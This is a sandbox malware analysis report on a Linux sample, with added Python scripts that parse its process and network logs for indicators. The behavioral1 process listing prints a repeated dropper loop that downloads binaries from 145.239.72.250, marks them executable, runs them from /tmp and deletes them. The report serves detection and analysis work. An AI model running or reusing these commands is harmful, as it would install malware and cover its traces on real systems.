Malware Analysis Report

2024-11-13 13:22

Sample ID: 240616-3s228sthjf
Target: b5d1b02949999a3eeb829840ff8d2fae_JaffaCakes118
SHA256: e8870d855c6592d00913d785affd6b7bd0496643450668d83b40d149c42d1239
Tags: (none listed)
Score: 1/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score: 1/10

SHA256

e8870d855c6592d00913d785affd6b7bd0496643450668d83b40d149c42d1239

Threat Level: No (potentially) malicious behavior was detected

Sandbox verdict for b5d1b02949999a3eeb829840ff8d2fae_JaffaCakes118: no (potentially) malicious behavior was detected. No signature fired in any of the four detonations (Signatures: N/A throughout), which is what the 1/10 score reflects. Read the verdict against the behavioral1 process listing below: it records a repeated wget, chmod +x, execute, rm -rf sequence fetching a series of files from http://145.239.72.250/, and that activity is present in the trace even though no signature matched it.

Malicious Activity Summary

N/A

MITRE ATT&CK

N/A

Analysis: static1

Detonation Overview

Reported

2024-06-16 23:47

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-16 23:47

Reported

2024-06-16 23:49

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

1s

Max time network

129s

Command Line

[/tmp/b5d1b02949999a3eeb829840ff8d2fae_JaffaCakes118]

Signatures

N/A

Processes

/tmp/b5d1b02949999a3eeb829840ff8d2fae_JaffaCakes118  [/tmp/b5d1b02949999a3eeb829840ff8d2fae_JaffaCakes118]
/usr/bin/wget  [wget http://145.239.72.250/ntpd]
/bin/chmod     [chmod +x ntpd]
/tmp/ntpd      [./ntpd]
/bin/rm        [rm -rf ntpd]
/usr/bin/wget  [wget http://145.239.72.250/sshd]
/bin/chmod     [chmod +x sshd]
/tmp/sshd      [./sshd]
/bin/rm        [rm -rf sshd]
/usr/bin/wget  [wget http://145.239.72.250/openssh]
/bin/chmod     [chmod +x openssh]
/tmp/openssh   [./openssh]
/bin/rm        [rm -rf openssh]
/usr/bin/wget  [wget http://145.239.72.250/bash]
/bin/chmod     [chmod +x bash]
/tmp/bash      [./bash]
/bin/rm        [rm -rf bash]
/usr/bin/wget  [wget http://145.239.72.250/tftp]
/bin/chmod     [chmod +x tftp]
/tmp/tftp      [./tftp]
/bin/rm        [rm -rf tftp]
/usr/bin/wget  [wget http://145.239.72.250/wget]
/bin/chmod     [chmod +x wget]
/tmp/wget      [./wget]
/bin/rm        [rm -rf wget]
/usr/bin/wget  [wget http://145.239.72.250/cron]
/bin/chmod     [chmod +x cron]
/tmp/cron      [./cron]
/bin/rm        [rm -rf cron]
/usr/bin/wget  [wget http://145.239.72.250/ftp]
/bin/chmod     [chmod +x ftp]
/tmp/ftp       [./ftp]
/bin/rm        [rm -rf ftp]
/usr/bin/wget  [wget http://145.239.72.250/pftp]
/bin/chmod     [chmod +x pftp]
/tmp/pftp      [./pftp]
/bin/rm        [rm -rf pftp]
/usr/bin/wget  [wget http://145.239.72.250/sh]
/bin/chmod     [chmod +x sh]
/tmp/sh        [./sh]
/bin/rm        [rm -rf sh]
/usr/bin/wget  [wget http://145.239.72.250/ ]
/bin/chmod     [chmod +x ]
/tmp/          [./ ]
/bin/rm        [rm -rf ]
/usr/bin/wget  [wget http://145.239.72.250/apache2]
/bin/chmod     [chmod +x apache2]
/tmp/apache2   [./apache2]
/bin/rm        [rm -rf apache2]
/usr/bin/wget  [wget http://145.239.72.250/telnetd]
/bin/chmod     [chmod +x telnetd]
/tmp/telnetd   [./telnetd]
/bin/rm        [rm -rf telnetd]
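The listing above is one download-and-execute loop: for each name, wget it from 145.239.72.250, chmod +x, run it from /tmp, then rm -rf it. One iteration carries an empty name (wget http://145.239.72.250/ followed by chmod +x, ./ and rm -rf with no operand), which a naive matcher would miss. The script below is an added example, not part of this report or of any sandbox's code, that parses such a listing and flags each wget that is followed by chmod, execution and deletion of the same file name. It assumes the process path and its bracketed command line are joined onto one line per process (the report prints them on separate lines); the sample input is constructed from the rows above.

```python
import re
from dataclasses import dataclass
from urllib.parse import urlparse

# Constructed sample: process path and command line copied from the behavioral1
# listing, joined as "path [cmdline]". Three full cycles plus the empty-name
# cycle are included.
SAMPLE_PROCESSES = """\
/tmp/b5d1b02949999a3eeb829840ff8d2fae_JaffaCakes118 [/tmp/b5d1b02949999a3eeb829840ff8d2fae_JaffaCakes118]
/usr/bin/wget [wget http://145.239.72.250/ntpd]
/bin/chmod [chmod +x ntpd]
/tmp/ntpd [./ntpd]
/bin/rm [rm -rf ntpd]
/usr/bin/wget [wget http://145.239.72.250/sshd]
/bin/chmod [chmod +x sshd]
/tmp/sshd [./sshd]
/bin/rm [rm -rf sshd]
/usr/bin/wget [wget http://145.239.72.250/ ]
/bin/chmod [chmod +x ]
/tmp/ [./ ]
/bin/rm [rm -rf ]
/usr/bin/wget [wget http://145.239.72.250/telnetd]
/bin/chmod [chmod +x telnetd]
/tmp/telnetd [./telnetd]
/bin/rm [rm -rf telnetd]
"""

LINE_RE = re.compile(r"^(?P<path>\S+)\s+\[(?P<cmd>.*)\]$")


def parse_processes(text):
    """Return (path, argv) pairs; argv is the bracketed command line split on whitespace."""
    procs = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            procs.append((m.group("path"), m.group("cmd").split()))
    return procs


@dataclass
class DropChain:
    url: str
    host: str
    name: str            # last path segment of the URL; empty for "wget http://host/ "
    made_executable: bool = False
    executed: bool = False
    removed: bool = False

    @property
    def complete(self):
        return self.made_executable and self.executed and self.removed


def find_drop_chains(procs, window=3):
    """Flag each wget of an http(s) URL that is followed, within `window`
    later processes, by chmod +x, execution and deletion of the same name."""
    chains = []
    for i, (_, argv) in enumerate(procs):
        if argv[:1] != ["wget"] or len(argv) < 2 or not argv[1].startswith("http"):
            continue
        parsed = urlparse(argv[1])
        name = parsed.path.rsplit("/", 1)[-1]
        name_args = [name] if name else []   # "chmod +x " / "rm -rf " with no operand still match
        chain = DropChain(url=argv[1], host=parsed.hostname or "", name=name)
        for _, a in procs[i + 1 : i + 1 + window]:
            if a[:2] == ["chmod", "+x"] and a[2:] == name_args:
                chain.made_executable = True
            elif a == [f"./{name}"]:          # "./" alone for the empty-name cycle
                chain.executed = True
            elif a[:2] == ["rm", "-rf"] and a[2:] == name_args:
                chain.removed = True
        chains.append(chain)
    return chains


def summarize(chains):
    """Collapse the chains into the IOC summary a triage note would carry."""
    return {
        "hosts": sorted({c.host for c in chains}),
        "urls": [c.url for c in chains],
        "dropped_names": [c.name for c in chains if c.name],
        "complete_chains": sum(1 for c in chains if c.complete),
        "empty_name_chains": sum(1 for c in chains if not c.name),
    }


if __name__ == "__main__":
    found = find_drop_chains(parse_processes(SAMPLE_PROCESSES))
    for c in found:
        print(f"{c.url!r:45} complete={c.complete}")
    print(summarize(found))
```

The window of three is deliberate: the loop on this page never interleaves cycles, so a chmod, exec or rm further away than that belongs to a different download and should not be credited to this one.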

Network

Country  Destination          Domain                    Proto
N/A      224.0.0.251:5353     -                         udp
FR       145.239.72.250:80    145.239.72.250            tcp
US       1.1.1.1:53           henosis.fr                udp
US       1.1.1.1:53           henosis.fr                udp
FR       145.239.72.250:80    henosis.fr                tcp
FR       145.239.72.250:80    henosis.fr                tcp
FR       145.239.72.250:80    henosis.fr                tcp
FR       145.239.72.250:80    henosis.fr                tcp
US       151.101.65.91:443    -                         tcp
FR       145.239.72.250:80    henosis.fr                tcp
FR       145.239.72.250:80    henosis.fr                tcp
FR       145.239.72.250:80    henosis.fr                tcp
FR       145.239.72.250:80    henosis.fr                tcp
GB       185.125.188.62:443   -                         tcp
GB       185.125.188.62:443   -                         tcp
US       151.101.65.91:443    -                         tcp
FR       145.239.72.250:80    henosis.fr                tcp
FR       145.239.72.250:80    henosis.fr                tcp
FR       145.239.72.250:80    henosis.fr                tcp
FR       145.239.72.250:80    henosis.fr                tcp
GB       89.187.167.3:443     -                         tcp
US       1.1.1.1:53           1527653184.rsc.cdn77.org  udp
US       1.1.1.1:53           1527653184.rsc.cdn77.org  udp
GB       195.181.164.20:443   1527653184.rsc.cdn77.org  tcp
(- = no domain recorded for the connection)

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-16 23:47

Reported

2024-06-16 23:50

Platform

debian9-armhf-20240611-en

Max time network

38s

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

Country Destination Domain Proto
FR 145.239.72.250:80 145.239.72.250 tcp
US 1.1.1.1:53 henosis.fr udp
FR 145.239.72.250:443 henosis.fr tcp
FR 145.239.72.250:80 henosis.fr tcp
US 1.1.1.1:53 henosis.fr udp
FR 145.239.72.250:443 henosis.fr tcp
FR 145.239.72.250:80 henosis.fr tcp
US 1.1.1.1:53 henosis.fr udp
FR 145.239.72.250:443 henosis.fr tcp
FR 145.239.72.250:80 henosis.fr tcp
US 1.1.1.1:53 henosis.fr udp
FR 145.239.72.250:443 henosis.fr tcp
FR 145.239.72.250:80 henosis.fr tcp
US 1.1.1.1:53 henosis.fr udp
FR 145.239.72.250:443 henosis.fr tcp
FR 145.239.72.250:80 henosis.fr tcp
US 1.1.1.1:53 henosis.fr udp
FR 145.239.72.250:443 henosis.fr tcp
FR 145.239.72.250:80 henosis.fr tcp
US 1.1.1.1:53 henosis.fr udp
FR 145.239.72.250:443 henosis.fr tcp
FR 145.239.72.250:80 henosis.fr tcp
US 1.1.1.1:53 henosis.fr udp
FR 145.239.72.250:443 henosis.fr tcp
FR 145.239.72.250:80 henosis.fr tcp
US 1.1.1.1:53 henosis.fr udp
FR 145.239.72.250:443 henosis.fr tcp
FR 145.239.72.250:80 henosis.fr tcp
US 1.1.1.1:53 henosis.fr udp
FR 145.239.72.250:443 henosis.fr tcp
FR 145.239.72.250:80 henosis.fr tcp
US 1.1.1.1:53 henosis.fr udp
FR 145.239.72.250:443 henosis.fr tcp
FR 145.239.72.250:80 henosis.fr tcp
FR 145.239.72.250:443 henosis.fr tcp
FR 145.239.72.250:80 henosis.fr tcp
FR 145.239.72.250:443 henosis.fr tcp
FR 145.239.72.250:80 henosis.fr tcp
FR 145.239.72.250:443 henosis.fr tcp
FR 145.239.72.250:80 henosis.fr tcp
FR 145.239.72.250:443 henosis.fr tcp
FR 145.239.72.250:80 henosis.fr tcp
FR 145.239.72.250:443 henosis.fr tcp
FR 145.239.72.250:80 henosis.fr tcp
FR 145.239.72.250:443 henosis.fr tcp
FR 145.239.72.250:80 henosis.fr tcp
FR 145.239.72.250:443 henosis.fr tcp
FR 145.239.72.250:80 henosis.fr tcp
FR 145.239.72.250:443 henosis.fr tcp
FR 145.239.72.250:80 henosis.fr tcp
FR 145.239.72.250:443 henosis.fr tcp
FR 145.239.72.250:80 henosis.fr tcp
FR 145.239.72.250:443 henosis.fr tcp
FR 145.239.72.250:80 henosis.fr tcp
FR 145.239.72.250:443 henosis.fr tcp
FR 145.239.72.250:80 henosis.fr tcp
FR 145.239.72.250:443 henosis.fr tcp
FR 145.239.72.250:80 henosis.fr tcp
FR 145.239.72.250:443 henosis.fr tcp
FR 145.239.72.250:80 henosis.fr tcp
FR 145.239.72.250:443 henosis.fr tcp
FR 145.239.72.250:80 henosis.fr tcp
FR 145.239.72.250:443 henosis.fr tcp
FR 145.239.72.250:80 henosis.fr tcp
FR 145.239.72.250:443 henosis.fr tcp
FR 145.239.72.250:80 henosis.fr tcp
FR 145.239.72.250:443 henosis.fr tcp
FR 145.239.72.250:80 henosis.fr tcp
FR 145.239.72.250:443 henosis.fr tcp
FR 145.239.72.250:80 henosis.fr tcp
FR 145.239.72.250:443 henosis.fr tcp
FR 145.239.72.250:80 henosis.fr tcp
FR 145.239.72.250:80 henosis.fr tcp
US 1.1.1.1:53 henosis.fr udp
FR 145.239.72.250:443 henosis.fr tcp
FR 145.239.72.250:80 henosis.fr tcp
US 1.1.1.1:53 henosis.fr udp
FR 145.239.72.250:443 henosis.fr tcp
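The Network tables in behavioral1 and behavioral2 share one layout, but in behavioral1 the Domain column is empty (or marked -) for several rows, and in one row it holds the IP address itself rather than a name. The script below is an added example, not part of this report, that parses that layout into a summary of DNS lookups, contacted endpoints with hit counts, and destinations that carry no resolved name. The sample rows are copied from the behavioral1 table; the field names and summary keys are this example's own.

```python
import ipaddress
from collections import Counter, defaultdict

# Constructed sample: rows copied from the behavioral1 Network table, in the
# report's "Country Destination Domain Proto" layout. The Domain column may be
# absent entirely or written as "-".
SAMPLE_NETWORK = """\
Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
FR 145.239.72.250:80 145.239.72.250 tcp
US 1.1.1.1:53 henosis.fr udp
US 1.1.1.1:53 henosis.fr udp
FR 145.239.72.250:80 henosis.fr tcp
FR 145.239.72.250:80 henosis.fr tcp
US 151.101.65.91:443 - tcp
GB 185.125.188.62:443 tcp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
GB 195.181.164.20:443 1527653184.rsc.cdn77.org tcp
"""


def parse_network(text):
    """Parse rows into dicts; a 3-field row or a "-" placeholder means no Domain (None)."""
    rows = []
    for line in text.splitlines():
        fields = line.split()
        if not fields or fields[0] == "Country":
            continue                      # header or blank line
        if len(fields) == 4:
            country, dest, domain, proto = fields
            if domain == "-":
                domain = None
        elif len(fields) == 3:
            country, dest, proto = fields
            domain = None
        else:
            raise ValueError(f"unexpected row: {line!r}")
        ip, _, port = dest.rpartition(":")
        rows.append({"country": country, "ip": ip, "port": int(port),
                     "domain": domain, "proto": proto.lower()})
    return rows


def summarize_network(rows):
    """Separate DNS lookups from real connections and attribute names to addresses."""
    dns_queries = Counter()        # names looked up over udp/53
    endpoints = Counter()          # (ip, port, proto) -> hit count, DNS excluded
    names_for_ip = defaultdict(set)
    accessed_by_ip = set()         # Domain column held the address itself
    multicast = set()              # e.g. 224.0.0.251:5353 is mDNS, local noise
    unattributed = set()           # contacted with no name recorded at all
    for r in rows:
        if r["port"] == 53 and r["proto"] == "udp":
            if r["domain"]:
                dns_queries[r["domain"]] += 1
            continue
        endpoints[(r["ip"], r["port"], r["proto"])] += 1
        if ipaddress.ip_address(r["ip"]).is_multicast:
            multicast.add(r["ip"])
            continue
        domain = r["domain"]
        if domain is None:
            unattributed.add(r["ip"])
            continue
        try:
            ipaddress.ip_address(domain)
            accessed_by_ip.add(r["ip"])
        except ValueError:
            names_for_ip[r["ip"]].add(domain)
    return {
        "dns_queries": dict(dns_queries),
        "endpoints": dict(endpoints),
        "names_for_ip": {ip: sorted(n) for ip, n in names_for_ip.items()},
        "accessed_by_ip": sorted(accessed_by_ip),
        "multicast": sorted(multicast),
        "unattributed": sorted(unattributed),
    }


if __name__ == "__main__":
    for key, value in summarize_network(parse_network(SAMPLE_NETWORK)).items():
        print(f"{key}: {value}")
```

The unattributed list (addresses contacted on 443 with no name in the table) is the part to check against the sandbox's baseline traffic before any of it is attributed to the sample; the page gives no basis for tying those connections to the downloader loop.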

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-06-16 23:47

Reported

2024-06-16 23:47

Platform

debian9-mipsbe-20240611-en

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

N/A

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-06-16 23:47

Reported

2024-06-16 23:47

Platform

debian9-mipsel-20240611-en

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

N/A

Files

N/A